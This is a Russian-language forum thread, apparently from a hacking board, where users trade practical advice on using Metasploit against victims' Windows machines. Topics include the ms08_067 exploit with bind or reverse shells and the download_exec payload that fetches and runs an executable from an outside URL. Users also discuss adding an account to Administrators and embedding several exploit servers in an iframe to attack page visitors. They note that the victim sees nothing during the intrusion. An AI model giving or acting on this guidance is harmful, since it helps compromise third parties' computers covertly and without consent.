Да Я читал выше по теме про проблему с кодировкой у Sergey_Gusev(ему помог штирлиц), но есть одно НО. У него они хоть отображались кракозябрами, а уменя тупо вопросики сплошные. А мне надо заюзать windows/exec, чтобы добавить соданого юзера в "Администраторы"
Пиши комманды cmd в кодировке 886 (Dos) и юзай начинку download_exec Проблема с кодировкое есть, решения пока не нашёл...
Поправьте пожалуйста если неправильно: Я так понял, что при способе ( download_exec) metsploit aбиндит на компе атакуещего порт к которому жертва подключаеться и запускает скрипт. Правильно? Еще Я видел там payload windows/upexec/bind_tcp Windows Upload/execute, Bind TCP Stager Правильно ли Я понимаю, что он предназначен для закачки на комп атакуемого проги или скрипта и тутже запускает его от имени системной учетки? И еще один вопрос зачем там bind_tcp?
Да, вопросики эти реально бесят ???????? )) Иногда прокатывает копирование этих вопросиков..например C:>cd ???????? и продвигаешься дальше...но гемор !!! Люди знающие подскажите при закачке exe на удаленную машину почему не выполняется файл? Ситуация такая: C:> start file.exe (файл в корне С:\) Смотрим далее C:>tasklist он висит в процессах, но не выполняется (так как коннекта ко мне нет )))) И фаера нет!!!! пробывал и runas с правами админа. не проходит, что может быть? У себя, запускается. Почему работает конект в локалке только, а в инет не прокатывает? зависит от сплоита? вот например использую: ms08_067_netapi.rb + bind_tcp.rb в локалке работает, а как выходишь за пределы... бесполезно.. что не так? И последний вопросик!!!! Не получается добавить новые сплоиты. Update ваще ни чего не грузит. Вот например: беру сплоит вот здесь сохраняю имя.rb, далее кидаю в папку где сплойты. При запуске MSF 3.2 он не видит нового сплоита. Как правильно добавить?
начинка download_exec скачивает exe файл по указанному в параметрах URL и передаёт управление ему после закачки... смотри info payload_name - там написано что делает каждая начинка и для чего она...
На их сайте нашел, http://trac.metasploit.com/ticket/253 попробовал поменять у себя такие же файлики в C:\document and settings... Перестал грузиться ваще metasploit.
Возможно, если NAT на пути из твоей локалки в интернет, то стоит лишь настроить редирект с внешнего ип на внутренний, на тот, где web сервер метасплоита, NAT на стороне жертвы обходится использованием начинки реверс-шелл (бэкконнект).
У меня VPN, я думал редирект есть. Подскажите как настроить редирект? Не могу понять ситуацию со сплоитами даунлодерами... Беру сплоит windows/browser/....(не помню точно) беру начинку windows/dawnload_exec... (к примеру)Извиняюсь за неточность, но суть всем понятна далее set URL www.abc.com/file.exe {enter} т.е. я на хост www.abc.com заливаю этот file.exe Далее он поднимает сервер http://0.0.0.0:80/eweffewefifr что получается, я захожу по ссылке http://0.0.0.0:80/eweffewefifr сплоит пробивает браузер и закачивает file.exe с хоста и запускает. Правильно??? или file.exe должен лежать на компе??? Сам не могу проверить... либо сплоиты меня не пробивают или висту или мазилу либо я не правильно что то использую (хотя на некоторые сплойты ругается антивирь.. но при выключении его закачки и запуска файла я не ощущаю)
Наболела еще одна тема! Так как связки сплойтов вещь дорогая и приватная)) Можно ли обойтись средствами метасплоита???? Например: создадим 5 консолей с разными сплоитами и начинками, запустим их... скопируем все поднятые сервера (адреса URL) залеьем их в <iframe> на страничку или куда угодно. Т.е. должны выполниться все 5 атак. Сработает??? или метасплойт выполняет только одну сессию (одна консоль) Вопрос про выполнение. Когда используется сплоит с VNC сервером то при подключении к удаленному компу выскакивает на удаленном компе! окошко Metsploit.... т.д. Скажите а когда используем сплоит для доступа к командной строке, выскакивает на удаленном что-нибудь при подключении?
Не судьба параметры посмотреть начинки download_exec? Там есть параметр URL - вот оттуда и буден скачанен файл, а ссылка должна вести на твой комп со сплоитом (для этого нужно иметь внешний IP) Через VPN врядли что получится - это опять же путь в одну сторону... Вешай сплоит в инете, читай вторую часть: https://forum.antichat.ru/thread21686.html
Ничего не выскакивет , ты жжёшь !! ну сам подумай с какой стати на удалённом компе будет что то выскакивать ! Да , типо сообщит юзеру "Вас ханули метоспойтом ! "
Нет - нечего не выскакивает, только процесс cmd виден в диспечере задач. А если использовать инжект в dll (например VNC-inj) то вообще пусто... P.S. И вообще в карте статей в самом низу есть ссылки на статьи по MSF https://forum.antichat.ru/thread19610.html читай остальные...
Самый дельный ТОП поисплойзованию сплоитов!!!Реально помог мне! Не могбы ты описать сплойты ms06-035.ms06-040. Винда у удолённой машины XP SP2/ Зарание спс!
Зачем тебе этот сплоит? Пользуйся новыми, вот например ms08_067_netapi или например есть уже ms08_068. Со связкой например shell_bind_tcp. Все есть в MSF 3.2
Интересует след. вопрос: lebed ты написал Сделал cmd-ный скрипт и закачал на сайт на народе. Используя download_exec все время пишет ошибку Сдается мне этот метод работает только с exe-шниками
